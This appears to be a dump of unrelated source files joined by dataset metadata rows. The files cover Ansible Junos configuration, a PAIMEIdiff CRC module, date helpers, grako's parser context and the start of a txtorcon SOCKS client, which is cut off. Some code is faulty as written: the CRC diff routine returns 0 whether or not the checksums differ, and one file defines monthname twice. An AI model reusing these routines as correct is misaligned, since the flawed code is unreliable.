def encrypt(data):
return pubkey.encrypt(data, padding.PKCS1v15())
self.net.push_packet(
'LOGIN>Encryption Response',
{
'shared_secret': encrypt(self.auth.shared_secret),
'verify_token': encrypt(packet.data['verify_token']),
}
)
self.net.enable_crypto(self.auth.shared_secret)
| mit | -2,816,174,595,662,378,500 | 33.121622 | 79 | 0.588515 | false |
britcey/ansible | lib/ansible/modules/network/junos/junos_config.py | 1 | 12228 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: junos_config
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage configuration on devices running Juniper JUNOS
description:
- This module provides an implementation for working with the active
configuration running on Juniper JUNOS devices. It provides a set
of arguments for loading configuration, performing rollback operations
and zeroing the active configuration on the device.
extends_documentation_fragment: junos
options:
lines:
description:
- This argument takes a list of C(set) or C(delete) configuration
lines to push into the remote device. Each line must start with
either C(set) or C(delete). This argument is mutually exclusive
with the I(src) argument.
required: false
default: null
src:
description:
- The I(src) argument provides a path to the configuration file
to load into the remote system. The path can either be a full
system path to the configuration file if the value starts with /
or relative to the root of the implemented role or playbook.
This argument is mutually exclusive with the I(lines) argument.
required: false
default: null
version_added: "2.2"
src_format:
description:
- The I(src_format) argument specifies the format of the configuration
found int I(src). If the I(src_format) argument is not provided,
the module will attempt to determine the format of the configuration
file specified in I(src).
required: false
default: null
choices: ['xml', 'set', 'text', 'json']
version_added: "2.2"
rollback:
description:
- The C(rollback) argument instructs the module to rollback the
current configuration to the identifier specified in the
argument. If the specified rollback identifier does not
exist on the remote device, the module will fail. To rollback
to the most recent commit, set the C(rollback) argument to 0.
required: false
default: null
zeroize:
description:
- The C(zeroize) argument is used to completely sanitize the
remote device configuration back to initial defaults. This
argument will effectively remove all current configuration
statements on the remote device.
required: false
default: null
confirm:
description:
- The C(confirm) argument will configure a time out value for
the commit to be confirmed before it is automatically
rolled back. If the C(confirm) argument is set to False, this
argument is silently ignored. If the value for this argument
is set to 0, the commit is confirmed immediately.
required: false
default: 0
comment:
description:
- The C(comment) argument specifies a text string to be used
when committing the configuration. If the C(confirm) argument
is set to False, this argument is silently ignored.
required: false
default: configured by junos_config
replace:
description:
- The C(replace) argument will instruct the remote device to
replace the current configuration hierarchy with the one specified
in the corresponding hierarchy of the source configuration loaded
from this module.
- Note this argument should be considered deprecated. To achieve
the equivalent, set the I(update) argument to C(replace). This argument
        will be removed in a future release. The C(replace) and C(update)
        arguments are mutually exclusive.
required: false
choices: ['yes', 'no']
default: false
backup:
description:
- This argument will cause the module to create a full backup of
the current C(running-config) from the remote device before any
changes are made. The backup file is written to the C(backup)
folder in the playbook root directory. If the directory does not
exist, it is created.
required: false
default: no
choices: ['yes', 'no']
version_added: "2.2"
update:
description:
- This argument will decide how to load the configuration
        data, particularly when the candidate configuration and loaded
configuration contain conflicting statements. Following are
accepted values.
C(merge) combines the data in the loaded configuration with the
candidate configuration. If statements in the loaded configuration
conflict with statements in the candidate configuration, the loaded
statements replace the candidate ones.
C(override) discards the entire candidate configuration and replaces
it with the loaded configuration.
C(replace) substitutes each hierarchy level in the loaded configuration
for the corresponding level.
required: false
default: merge
choices: ['merge', 'override', 'replace']
version_added: "2.3"
requirements:
- junos-eznc
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- Loading JSON-formatted configuration I(json) is supported
    starting in Junos OS Release 16.1.
"""
EXAMPLES = """
- name: load configure file into device
junos_config:
src: srx.cfg
comment: update config
provider: "{{ netconf }}"
- name: load configure lines into device
junos_config:
lines:
- set interfaces ge-0/0/1 unit 0 description "Test interface"
- set vlans vlan01 description "Test vlan"
comment: update config
provider: "{{ netconf }}"
- name: rollback the configuration to id 10
junos_config:
rollback: 10
provider: "{{ netconf }}"
- name: zero out the current configuration
junos_config:
zeroize: yes
provider: "{{ netconf }}"
- name: confirm a previous commit
junos_config:
provider: "{{ netconf }}"
"""
RETURN = """
backup_path:
description: The full path to the backup file
returned: when backup is yes
type: string
sample: /playbooks/ansible/backup/config.2016-07-16@22:28:34
"""
import re
import json
import sys
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.junos import get_diff, load_config, get_configuration
from ansible.module_utils.junos import junos_argument_spec
from ansible.module_utils.junos import check_args as junos_check_args
from ansible.module_utils.netconf import send_request
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_text, to_native
if sys.version_info < (2, 7):
from xml.parsers.expat import ExpatError
ParseError = ExpatError
else:
ParseError = ElementTree.ParseError
USE_PERSISTENT_CONNECTION = True
DEFAULT_COMMENT = 'configured by junos_config'
def check_args(module, warnings):
junos_check_args(module, warnings)
if module.params['replace'] is not None:
module.fail_json(msg='argument replace is deprecated, use update')
zeroize = lambda x: send_request(x, ElementTree.Element('request-system-zeroize'))
rollback = lambda x: get_diff(x)
def guess_format(config):
try:
json.loads(config)
return 'json'
except ValueError:
pass
try:
ElementTree.fromstring(config)
return 'xml'
except ParseError:
pass
if config.startswith('set') or config.startswith('delete'):
return 'set'
return 'text'
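# Illustrative behaviour of guess_format (inputs are hypothetical):
#
#   guess_format('{"system": {}}')            # -> 'json'
#   guess_format('<configuration/>')          # -> 'xml'
#   guess_format('set system host-name r1')   # -> 'set'
#   guess_format('system { host-name r1; }')  # -> 'text'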
def filter_delete_statements(module, candidate):
reply = get_configuration(module, format='set')
match = reply.find('.//configuration-set')
if match is None:
# Could not find configuration-set in reply, perhaps device does not support it?
return candidate
config = to_native(match.text, encoding='latin1')
modified_candidate = candidate[:]
for index, line in reversed(list(enumerate(candidate))):
if line.startswith('delete'):
newline = re.sub('^delete', 'set', line)
if newline not in config:
del modified_candidate[index]
return modified_candidate
def configure_device(module, warnings):
candidate = module.params['lines'] or module.params['src']
kwargs = {
'comment': module.params['comment'],
'commit': not module.check_mode
}
if module.params['confirm'] > 0:
kwargs.update({
'confirm': True,
'confirm_timeout': module.params['confirm']
})
config_format = None
if module.params['src']:
config_format = module.params['src_format'] or guess_format(str(candidate))
if config_format == 'set':
kwargs.update({'format': 'text', 'action': 'set'})
else:
kwargs.update({'format': config_format, 'action': module.params['update']})
if isinstance(candidate, string_types):
candidate = candidate.split('\n')
# this is done to filter out `delete ...` statements which map to
# nothing in the config as that will cause an exception to be raised
if any((module.params['lines'], config_format == 'set')):
candidate = filter_delete_statements(module, candidate)
kwargs['format'] = 'text'
kwargs['action'] = 'set'
return load_config(module, candidate, warnings, **kwargs)
def main():
""" main entry point for module execution
"""
argument_spec = dict(
lines=dict(type='list'),
src=dict(type='path'),
src_format=dict(choices=['xml', 'text', 'set', 'json']),
# update operations
update=dict(default='merge', choices=['merge', 'override', 'replace', 'update']),
# deprecated replace in Ansible 2.3
replace=dict(type='bool'),
confirm=dict(default=0, type='int'),
comment=dict(default=DEFAULT_COMMENT),
# config operations
backup=dict(type='bool', default=False),
rollback=dict(type='int'),
zeroize=dict(default=False, type='bool'),
)
argument_spec.update(junos_argument_spec)
mutually_exclusive = [('lines', 'src', 'rollback', 'zeroize')]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False, 'warnings': warnings}
if module.params['backup']:
for conf_format in ['set', 'text']:
reply = get_configuration(module, format=conf_format)
match = reply.find('.//configuration-%s' % conf_format)
if match is not None:
break
else:
module.fail_json(msg='unable to retrieve device configuration')
result['__backup__'] = match.text.strip()
if module.params['rollback']:
if not module.check_mode:
diff = rollback(module)
if module._diff:
result['diff'] = {'prepared': diff}
result['changed'] = True
elif module.params['zeroize']:
if not module.check_mode:
zeroize(module)
result['changed'] = True
else:
diff = configure_device(module, warnings)
if diff:
if module._diff:
result['diff'] = {'prepared': diff}
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -4,767,133,261,227,598,000 | 32.966667 | 89 | 0.66454 | false |
Alwnikrotikz/paimei | console/modules/_PAIMEIdiff/DiffModules/crc.py | 1 | 2243 | #
# $Id$
#
from defines import *
class crc:
def __init__(self, parent=None):
self.attributes = {} # initialize attributes
self.attributes["Match"] = 1 # Match attribute set to 1 tells the main program we can be used to match
self.attributes["Diff"] = 1 # Diff attribute set to 1 tells the main program we can be used to diff
self.attributes["Level"] = FUNCTION_LEVEL | BASIC_BLOCK_LEVEL # these flags indicated we can diff/match both functions and basic blocks
self.parent = parent # set up the parent
self.module_name = "CRC" # give the module a name
self.author = "Peter Silberman" # author name
self.description = "CRC module uses the crc signature"
self.date = "09/22/06"
self.homepage = "http://www.openrce.org"
self.contact = "[email protected]"
self.accuracy = ACCURACY_HIGH
self.parent.register_match_function( self.match_function_by_crc, self ) # register a function matching routine
self.parent.register_match_basic_block( self.match_basic_block_by_crc, self ) # register a basic block matching routine
self.parent.register_diff_function( self.diff_function_by_crc, self ) # register a function diffing routine
self.parent.register_module(self) # register our module in the module table
def match_function_by_crc(self, function_a, function_b):
if function_a.ext["PAIMEIDiffFunction"].crc == function_b.ext["PAIMEIDiffFunction"].crc:
return 1
else:
return 0
def match_basic_block_by_crc(self, bb_a, bb_b):
if bb_a.ext["PAIMEIDiffBasicBlock"].crc == bb_b.ext["PAIMEIDiffBasicBlock"].crc:
return 1
else:
return 0
def diff_function_by_crc(self, function_a, function_b):
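        # NOTE: both branches below return 0, so a CRC mismatch is reported
        # the same way as a match.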
if function_a.ext["PAIMEIDiffFunction"].crc != function_b.ext["PAIMEIDiffFunction"].crc:
return 0
else:
return 0
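# Illustrative wiring (the parent object is hypothetical): PAIMEIdiff-style
# hosts construct each module with themselves as parent, so instantiation
# alone registers the match/diff callbacks above:
#
#   module = crc(parent=paimei_diff_instance)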
| gpl-2.0 | -5,157,040,256,780,206,000 | 46.76087 | 145 | 0.57111 | false |
legoktm/legobot-old | toolserver/pywp/timedate.py | 1 | 2209 | #!usr/bin/python
# (C) Legoktm 2008-2011, MIT License
import time, datetime
"""
Not to be run as a file
Contains lists and dictionaries to help with dates
Only for English Language, however translations are welcome.
"""
MonthNames = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December' ]
def monthname(number):
"""
Returns the month name
for the given integer.
"""
return MonthNames[int(number)-1]
days_in_month = {
1: 31,
2: 29,
3: 31,
4: 30,
5: 31,
6: 30,
7: 31,
8: 31,
9: 30,
10: 31,
11: 30,
12: 31
}
num_to_month = {
1:'January',
2:'February',
3:'March',
4:'April',
5:'May',
6:'June',
7:'July',
8:'August',
9:'September',
10:'October',
11:'November',
12:'December',
}
month_to_num = {
'January': 1,
'February': 2,
'March': 3,
'April': 4,
'May': 5,
'June': 6,
'July': 7,
'August': 8,
'September': 9,
'October': 10,
'November': 11,
'December': 12,
}
def daysinmonth(var):
"""
Returns the number of days in a month.
var = month name or number
"""
try:
int(var)
num = True
except ValueError:
num = False
if num:
return days_in_month[int(var)]
number = month_to_num[var]
return days_in_month[number]
def currtime():
"""
Returns a time.time() object
"""
return time.time()
def currentmonth():
"""
Returns the integer of the current month.
To get the current month name, use monthname(currentmonth())
"""
return time.gmtime(currtime()).tm_mon
def currentyear():
return time.gmtime(currtime()).tm_year
def numwithzero(num):
"""
	Returns a str where there is a
	'0' in front of the number
"""
num = int(num)
if num >= 10:
return str(num)
else:
		return '0' + str(num)
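# NOTE: this second monthname() definition shadows the one defined above;
# both return the same names via different lookups.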
def monthname(num):
"""
Returns the name of the month based on the integer.
"""
return num_to_month[int(num)]
def convertts(ts):
"""
Converts MediaWiki timestamps (ISO 8601)
to a human readable one.
"""
epochts = int(time.mktime(time.strptime(ts, '%Y-%m-%dT%H:%M:%SZ')))
st = time.gmtime(epochts)
year = str(st.tm_year)
hour = str(st.tm_hour)
min = str(st.tm_min)
monthname1 = monthname(st.tm_mon)
day = str(st.tm_mday)
return '%s:%s, %s %s %s' %(hour, min, day, monthname1, year)
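# Illustrative usage of the helpers above:
#
#   monthname(currentmonth())           # e.g. 'June'
#   daysinmonth('February')             # 29 (the table stores the leap-year maximum)
#   convertts('2011-06-01T12:30:00Z')   # e.g. '12:30, 1 June 2011' (the hour can
#                                       # shift: mktime assumes local time)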
| mit | 8,878,393,515,859,586,000 | 17.720339 | 139 | 0.634224 | false |
vmuriart/grako | grako/contexts.py | 1 | 22161 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import functools
from collections import namedtuple
from contextlib import contextmanager
from grako.util import notnone, ustr, prune_dict, is_list, info, safe_name
from grako.ast import AST
from grako import buffering
from grako import color
from grako.exceptions import (
FailedCut,
FailedLeftRecursion,
FailedLookahead,
FailedParse,
FailedPattern,
FailedSemantics,
FailedKeywordSemantics,
FailedToken,
OptionSucceeded
)
__all__ = ['ParseInfo', 'ParseContext']
ParseInfo = namedtuple(
'ParseInfo',
[
'buffer',
'rule',
'pos',
'endpos'
]
)
# decorator for rule implementation methods
def graken(*params, **kwparams):
def decorator(rule):
@functools.wraps(rule)
def wrapper(self):
name = rule.__name__
# remove the single leading and trailing underscore
# that the parser generator added
name = name[1:-1]
return self._call(rule, name, params, kwparams)
return wrapper
return decorator
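# Generated parsers decorate each rule method like this (illustrative):
#
#   @graken()
#   def _expression_(self):       # wrapper strips the underscores and
#       ...                       # dispatches via self._call(rule, 'expression', ...)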
class Closure(list):
pass
class ParseContext(object):
def __init__(self,
semantics=None,
parseinfo=False,
trace=False,
encoding='utf-8',
comments_re=None,
eol_comments_re=None,
whitespace=None,
ignorecase=False,
nameguard=None,
memoize_lookaheads=True,
left_recursion=True,
trace_length=72,
trace_separator=':',
trace_filename=False,
colorize=False,
keywords=None,
namechars='',
**kwargs):
super(ParseContext, self).__init__()
self._buffer = None
self.semantics = semantics
self.encoding = encoding
self.parseinfo = parseinfo
self.trace = trace
self.trace_length = trace_length
self.trace_separator = trace_separator
self.trace_filename = trace_filename
self.comments_re = comments_re
self.eol_comments_re = eol_comments_re
self.whitespace = whitespace
self.ignorecase = ignorecase
self.nameguard = nameguard
self.memoize_lookaheads = memoize_lookaheads
self.left_recursion = left_recursion
self.namechars = namechars
self._ast_stack = [AST()]
self._concrete_stack = [None]
self._rule_stack = []
self._cut_stack = [False]
self._memoization_cache = dict()
self._last_node = None
self._state = None
self._lookahead = 0
self._recursive_results = dict()
self._recursive_eval = []
self._recursive_head = []
self.colorize = colorize
self.keywords = set(keywords or [])
def _reset(self,
text=None,
filename=None,
semantics=None,
trace=None,
comments_re=None,
eol_comments_re=None,
whitespace=None,
ignorecase=None,
nameguard=None,
memoize_lookaheads=None,
left_recursion=None,
colorize=False,
namechars='',
**kwargs):
if ignorecase is None:
ignorecase = self.ignorecase
if nameguard is None:
nameguard = self.nameguard
if memoize_lookaheads is not None:
self.memoize_lookaheads = memoize_lookaheads
if left_recursion is not None:
self.left_recursion = left_recursion
if trace is not None:
self.trace = trace
if semantics is not None:
self.semantics = semantics
if colorize is not None:
self.colorize = colorize
if self.colorize:
color.init()
if isinstance(text, buffering.Buffer):
buffer = text
else:
buffer = buffering.Buffer(
text,
filename=filename,
comments_re=comments_re or self.comments_re,
eol_comments_re=eol_comments_re or self.eol_comments_re,
whitespace=notnone(whitespace, default=self.whitespace),
ignorecase=ignorecase,
nameguard=nameguard,
namechars=namechars or self.namechars,
**kwargs)
self._buffer = buffer
self._ast_stack = [AST()]
self._concrete_stack = [None]
self._rule_stack = []
self._cut_stack = [False]
self._memoization_cache = dict()
self._last_node = None
self._state = None
self._lookahead = 0
self._recursive_results = dict()
self._recursive_eval = []
self._recursive_head = []
def parse(self,
text,
rule_name='start',
filename=None,
semantics=None,
trace=False,
whitespace=None,
**kwargs):
try:
self.parseinfo = kwargs.pop('parseinfo', self.parseinfo)
self._reset(
text=text,
filename=filename,
semantics=semantics,
trace=trace or self.trace,
whitespace=whitespace if whitespace is not None else self.whitespace,
**kwargs
)
rule = self._find_rule(rule_name)
result = rule()
self.ast[rule_name] = result
return result
except FailedCut as e:
raise e.nested
finally:
self._clear_cache()
def goto(self, pos):
self._buffer.goto(pos)
@property
def last_node(self):
return self._last_node
@last_node.setter
def last_node(self, value):
self._last_node = value
@property
def _pos(self):
return self._buffer.pos
def _clear_cache(self):
self._memoization_cache = dict()
self._recursive_results = dict()
def _goto(self, pos):
self._buffer.goto(pos)
def _next_token(self):
self._buffer.next_token()
@property
def ast(self):
return self._ast_stack[-1]
@ast.setter
def ast(self, value):
self._ast_stack[-1] = value
def name_last_node(self, name):
self.ast[name] = self.last_node
def add_last_node_to_name(self, name):
self.ast.setlist(name, self.last_node)
def _push_ast(self):
self._push_cst()
self._ast_stack.append(AST())
def _pop_ast(self):
self._pop_cst()
return self._ast_stack.pop()
@property
def cst(self):
return self._concrete_stack[-1]
@cst.setter
def cst(self, value):
self._concrete_stack[-1] = value
def _push_cst(self):
self._concrete_stack.append(None)
def _pop_cst(self):
return self._concrete_stack.pop()
def _add_cst_node(self, node):
if node is None:
return
previous = self.cst
if previous is None:
self.cst = self._copy_node(node)
elif is_list(previous):
previous.append(node)
else:
self.cst = [previous, node]
def _extend_cst(self, node):
if node is None:
return
previous = self.cst
if previous is None:
self.cst = self._copy_node(node)
elif is_list(node):
if is_list(previous):
previous.extend(node)
else:
self.cst = [previous] + node
elif is_list(previous):
previous.append(node)
else:
self.cst = [previous, node]
def _copy_node(self, node):
if node is None:
return None
elif is_list(node):
return node[:]
else:
return node
def _is_cut_set(self):
return self._cut_stack[-1]
def _cut(self):
self._cut_stack[-1] = True
# Kota Mizushima et al say that we can throw away
# memos for previous positions in the buffer under
# certain circumstances, without affecting the linearity
# of PEG parsing.
# http://goo.gl/VaGpj
#
# We adopt the heuristic of always dropping the cache for
# positions less than the current cut position. It remains to
# be proven if doing it this way affects linearity. Empirically,
# it hasn't.
cutpos = self._pos
def prune_cache(cache):
prune_dict(cache, lambda k, _: k[0] < cutpos)
prune_cache(self._memoization_cache)
prune_cache(self._recursive_results)
def _push_cut(self):
self._cut_stack.append(False)
def _pop_cut(self):
return self._cut_stack.pop()
def _enter_lookahead(self):
self._lookahead += 1
def _leave_lookahead(self):
self._lookahead -= 1
def _memoization(self):
return self.memoize_lookaheads or self._lookahead == 0
def _rulestack(self):
stack = self.trace_separator.join(self._rule_stack)
if len(stack) > self.trace_length:
stack = '...' + stack[-self.trace_length:].lstrip(self.trace_separator)
return stack
def _find_rule(self, name):
return None
def _find_semantic_rule(self, name):
if self.semantics is None:
return None, None
postproc = getattr(self.semantics, '_postproc', None)
if not callable(postproc):
postproc = None
rule = getattr(self.semantics, safe_name(name), None)
if callable(rule):
return rule, postproc
rule = getattr(self.semantics, '_default', None)
if callable(rule):
return rule, postproc
return None, postproc
def _trace(self, msg, *params):
if self.trace:
msg = msg % params
info(ustr(msg), file=sys.stderr)
def _trace_event(self, event):
if self.trace:
fname = ''
if self.trace_filename:
fname = self._buffer.line_info().filename + '\n'
self._trace('%s \n%s%s \n',
event + ' ' + self._rulestack(),
color.Style.DIM + fname,
color.Style.NORMAL + self._buffer.lookahead().rstrip('\r\n')
)
def _trace_match(self, token, name=None, failed=False):
if self.trace:
fname = ''
if self.trace_filename:
fname = self._buffer.line_info().filename + '\n'
name = '/%s/' % name if name else ''
            fgcolor = color.Fore.GREEN + '< ' if not failed else color.Fore.RED + '! '
self._trace(
color.Style.BRIGHT + fgcolor + '"%s" %s\n%s%s\n',
token,
name,
color.Style.DIM + fname,
color.Style.NORMAL + self._buffer.lookahead().rstrip('\r\n')
)
def _error(self, item, etype=FailedParse):
raise etype(
self._buffer,
list(reversed(self._rule_stack[:])),
item
)
def _fail(self):
self._error('fail')
def _get_parseinfo(self, node, name, start):
return ParseInfo(
self._buffer,
name,
start,
self._pos
)
def _call(self, rule, name, params, kwparams):
self._rule_stack.append(name)
pos = self._pos
try:
self._trace_event(color.Fore.YELLOW + color.Style.BRIGHT + '>')
self._last_node = None
node, newpos, newstate = self._invoke_rule(rule, name, params, kwparams)
self._goto(newpos)
self._state = newstate
self._trace_event(color.Fore.GREEN + color.Style.BRIGHT + '<')
self._add_cst_node(node)
self._last_node = node
return node
except FailedPattern:
self._error('Expecting <%s>' % name)
except FailedParse:
self._trace_event(color.Fore.RED + color.Style.BRIGHT + '!')
self._goto(pos)
raise
finally:
self._rule_stack.pop()
def _invoke_rule(self, rule, name, params, kwparams):
cache = self._memoization_cache
pos = self._pos
key = (pos, rule, self._state)
if key in cache:
memo = cache[key]
memo = self._left_recursion_check(name, key, memo)
if isinstance(memo, Exception):
raise memo
return memo
self._set_left_recursion_guard(name, key)
self._push_ast()
try:
if name[0].islower():
self._next_token()
rule(self)
node = self.ast
if not node:
node = self.cst
elif '@' in node:
node = node['@'] # override the AST
elif self.parseinfo:
node._parseinfo = self._get_parseinfo(
node,
name,
pos
)
node = self._invoke_semantic_rule(name, node, params, kwparams)
result = (node, self._pos, self._state)
result = self._left_recurse(rule, name, pos, key, result, params, kwparams)
if self._memoization() and not self._in_recursive_loop():
cache[key] = result
return result
except FailedParse as e:
if self._memoization():
cache[key] = e
raise
finally:
self._pop_ast()
def _set_left_recursion_guard(self, name, key):
exception = FailedLeftRecursion(
self._buffer,
list(reversed(self._rule_stack[:])),
name
)
# Alessandro Warth et al say that we can deal with
# direct and indirect left-recursion by seeding the
# memoization cache with a parse failure.
#
# http://www.vpri.org/pdf/tr2007002_packrat.pdf
#
if self._memoization():
self._memoization_cache[key] = exception
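        # Illustrative (hypothetical) grammar that this makes parseable:
        #
        #     expr = expr '+' term | term ;
        #
        # The seeded failure aborts the otherwise-infinite descent into
        # `expr` on its first visit; _left_recurse() below then re-applies
        # the rule, growing the match one iteration at a time.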
def _left_recursion_check(self, name, key, memo):
if isinstance(memo, FailedLeftRecursion) and self.left_recursion:
# At this point we know we've already seen this rule
# at this position. Either we've got a potential
# result from a previous pass that we can return, or
# we make a note of the rule so that we can take
# action as we unwind the rule stack.
if key in self._recursive_results:
memo = self._recursive_results[key]
else:
self._recursive_head.append(name)
return memo
def _in_recursive_loop(self):
head = self._recursive_head
return head and head[-1] in self._rule_stack
def _left_recurse(self, rule, name, pos, key, result, params, kwparams):
if self._memoization():
self._recursive_results[key] = result
# If the current name is in the head, then we've just
# unwound to the highest rule in the recursion
cache = self._memoization_cache
last_pos = pos
if (
[name] == self._recursive_head[-1:] and
self._recursive_head[-1:] != self._recursive_eval[-1:]
):
# Repeatedly apply the rule until it can't consume any
# more. We store the last good result each time. Prior
# to doing so we reset the position and remove any
# failures from the cache.
last_result = result
self._recursive_eval.append(name)
while self._pos > last_pos:
last_result = result
last_pos = self._pos
self._goto(pos)
prune_dict(cache, lambda _, v: isinstance(v, FailedParse))
try:
result = self._invoke_rule(rule, name, params, kwparams)
except FailedParse:
pass
result = last_result
self._recursive_results = dict()
self._recursive_head.pop()
self._recursive_eval.pop()
return result
def _invoke_semantic_rule(self, name, node, params, kwparams):
semantic_rule, postproc = self._find_semantic_rule(name)
try:
if semantic_rule:
node = semantic_rule(node, *(params or ()), **(kwparams or {}))
if postproc is not None:
postproc(self, node)
return node
except FailedSemantics as e:
self._error(str(e), FailedParse)
def _token(self, token):
self._next_token()
if self._buffer.match(token) is None:
self._trace_match(token, failed=True)
self._error(token, etype=FailedToken)
self._trace_match(token)
self._add_cst_node(token)
self._last_node = token
return token
def _constant(self, literal):
self._next_token()
self._trace_match(literal)
self._add_cst_node(literal)
self._last_node = literal
return literal
def _pattern(self, pattern):
token = self._buffer.matchre(pattern)
if token is None:
self._trace_match('', pattern, failed=True)
self._error(pattern, etype=FailedPattern)
self._trace_match(token, pattern)
self._add_cst_node(token)
self._last_node = token
return token
def _eof(self):
return self._buffer.atend()
def _eol(self):
return self._buffer.ateol()
def _check_eof(self):
self._next_token()
if not self._buffer.atend():
self._error('Expecting end of text.')
@contextmanager
def _try(self):
p = self._pos
s = self._state
ast_copy = self.ast.copy()
self._push_ast()
self.last_node = None
try:
self.ast = ast_copy
yield
ast = self.ast
cst = self.cst
except:
self._goto(p)
self._state = s
raise
finally:
self._pop_ast()
self.ast = ast
self._extend_cst(cst)
self.last_node = cst
@contextmanager
def _option(self):
self.last_node = None
self._push_cut()
try:
with self._try():
yield
raise OptionSucceeded()
except FailedCut:
raise
except FailedParse as e:
if self._is_cut_set():
raise FailedCut(e)
finally:
self._pop_cut()
@contextmanager
def _choice(self):
self.last_node = None
with self._try():
try:
yield
except OptionSucceeded:
pass
@contextmanager
def _optional(self):
self.last_node = None
with self._choice():
with self._option():
yield
@contextmanager
def _group(self):
self._push_cst()
try:
yield
cst = self.cst
finally:
self._pop_cst()
self._extend_cst(cst)
self.last_node = cst
@contextmanager
def _if(self):
p = self._pos
s = self._state
self._push_ast()
self._enter_lookahead()
try:
yield
finally:
self._leave_lookahead()
self._goto(p)
self._state = s
self._pop_ast() # simply discard
@contextmanager
def _ifnot(self):
try:
with self._if():
yield
except FailedParse:
pass
else:
self._error('', etype=FailedLookahead)
@contextmanager
def _ignore(self):
self._push_cst()
try:
self.cst = None
yield
finally:
self._pop_cst()
def _repeater(self, block, prefix=None):
while True:
self._push_cut()
self._push_cst()
try:
p = self._pos
with self._try():
if prefix:
with self._ignore():
prefix()
self._cut()
block()
cst = self.cst
if self._pos == p:
self._error('empty closure')
except FailedCut:
raise
except FailedParse as e:
if self._is_cut_set():
raise FailedCut(e)
break
finally:
self._pop_cst()
self._pop_cut()
self._add_cst_node(cst)
def _closure(self, block):
self._push_cst()
try:
self.cst = []
self._repeater(block)
cst = Closure(self.cst)
finally:
self._pop_cst()
self._add_cst_node(cst)
self.last_node = cst
return cst
def _positive_closure(self, block, prefix=None):
self._push_cst()
try:
self.cst = None
with self._try():
block()
self.cst = [self.cst]
self._repeater(block, prefix=prefix)
cst = Closure(self.cst)
finally:
self._pop_cst()
self._add_cst_node(cst)
self.last_node = cst
return cst
def _empty_closure(self):
cst = Closure([])
self._add_cst_node(cst)
self.last_node = cst
return cst
def _check_name(self):
name = self.last_node
        if (name.upper() if self.ignorecase else name) in self.keywords:
raise FailedKeywordSemantics('"%s" is a reserved word' % name)
| bsd-2-clause | 3,773,346,253,559,332,400 | 27.930809 | 87 | 0.515184 | false |
meejah/txtorcon | txtorcon/socks.py | 1 | 23368 | # in-progress; implementing SOCKS5 client-side stuff as extended by
# tor because txsocksx will not be getting Python3 support any time
# soon, and its underlying dependency (Parsely) also doesn't support
# Python3. Also, Tor's SOCKS5 implementation is especially simple,
# since it doesn't do BIND or UDP ASSOCIATE.
from __future__ import print_function
import six
import struct
from socket import inet_pton, inet_ntoa, inet_aton, AF_INET6, AF_INET
from twisted.internet.defer import inlineCallbacks, returnValue, Deferred
from twisted.internet.protocol import Protocol, Factory
from twisted.internet.address import IPv4Address, IPv6Address, HostnameAddress
from twisted.python.failure import Failure
from twisted.protocols import portforward
from twisted.protocols import tls
from twisted.internet.interfaces import IStreamClientEndpoint
from zope.interface import implementer
import ipaddress
import automat
from txtorcon import util
__all__ = (
'resolve',
'resolve_ptr',
'SocksError',
'GeneralServerFailureError',
'ConnectionNotAllowedError',
'NetworkUnreachableError',
'HostUnreachableError',
'ConnectionRefusedError',
'TtlExpiredError',
'CommandNotSupportedError',
'AddressTypeNotSupportedError',
'TorSocksEndpoint',
)
def _create_ip_address(host, port):
if not isinstance(host, six.text_type):
raise ValueError(
"'host' must be {}, not {}".format(six.text_type, type(host))
)
try:
a = ipaddress.ip_address(host)
except ValueError:
a = None
if isinstance(a, ipaddress.IPv4Address):
return IPv4Address('TCP', host, port)
if isinstance(a, ipaddress.IPv6Address):
return IPv6Address('TCP', host, port)
addr = HostnameAddress(host, port)
addr.host = host
return addr
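# For example, _create_ip_address(u"127.0.0.1", 9050) yields an IPv4Address,
# u"::1" an IPv6Address, and any other string (e.g. a hostname or .onion
# address) a HostnameAddress.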
class _SocksMachine(object):
"""
trying to prototype the SOCKS state-machine in automat
This is a SOCKS state machine to make a single request.
"""
_machine = automat.MethodicalMachine()
SUCCEEDED = 0x00
REPLY_IPV4 = 0x01
REPLY_HOST = 0x03
REPLY_IPV6 = 0x04
# XXX address = (host, port) instead
def __init__(self, req_type, host,
port=0,
on_disconnect=None,
on_data=None,
create_connection=None):
if req_type not in self._dispatch:
raise ValueError(
"Unknown request type '{}'".format(req_type)
)
if req_type == 'CONNECT' and create_connection is None:
raise ValueError(
"create_connection function required for '{}'".format(
req_type
)
)
if not isinstance(host, (bytes, str, six.text_type)):
raise ValueError(
"'host' must be text (not {})".format(type(host))
)
# XXX what if addr is None?
self._req_type = req_type
self._addr = _create_ip_address(six.text_type(host), port)
self._data = b''
self._on_disconnect = on_disconnect
self._create_connection = create_connection
# XXX FIXME do *one* of these:
self._on_data = on_data
self._outgoing_data = []
# the other side of our proxy
self._sender = None
self._when_done = util.SingleObserver()
def when_done(self):
"""
Returns a Deferred that fires when we're done
"""
return self._when_done.when_fired()
def _data_to_send(self, data):
if self._on_data:
self._on_data(data)
else:
self._outgoing_data.append(data)
def send_data(self, callback):
"""
drain all pending data by calling `callback()` on it
"""
# a "for x in self._outgoing_data" would potentially be more
# efficient, but then there's no good way to bubble exceptions
# from callback() out without lying about how much data we
# processed .. or eat the exceptions in here.
while len(self._outgoing_data):
data = self._outgoing_data.pop(0)
callback(data)
def feed_data(self, data):
